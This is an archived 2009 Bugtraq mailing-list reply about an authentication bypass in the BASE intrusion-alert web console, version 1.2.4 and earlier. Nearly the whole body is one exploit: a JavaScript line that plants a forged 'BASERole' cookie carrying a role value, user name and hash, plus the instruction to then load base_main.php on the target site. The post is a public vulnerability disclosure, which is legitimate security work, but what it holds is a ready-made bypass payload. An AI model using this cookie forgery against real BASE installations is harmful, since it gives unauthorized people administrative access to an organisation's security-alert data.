[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: Authentication Bypass in BASE version 1.2.4 and prior

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Re: Authentication Bypass in BASE version 1.2.4 and prior
From: timmedin@xxxxxxxxx
Date: Tue, 23 Jun 2009 21:20:10 -0600

Exploit: 
javascript:document.cookie="BASERole=10000|nidem|794b69ad33015df95578d5f4a19d390e;
 path=/";

Note: After make cookie go direct to http://[website]/base_main.php

Prev by Date: Authentication Bypas in BASE version 1.2.4 and prior
Next by Date: [ MDVSA-2009:139 ] libtorrent-rasterbar
Previous by thread: Re: Authentication Bypas in BASE version 1.2.4 and prior
Next by thread: [ MDVSA-2009:139 ] libtorrent-rasterbar
Index(es):
- Date
- Thread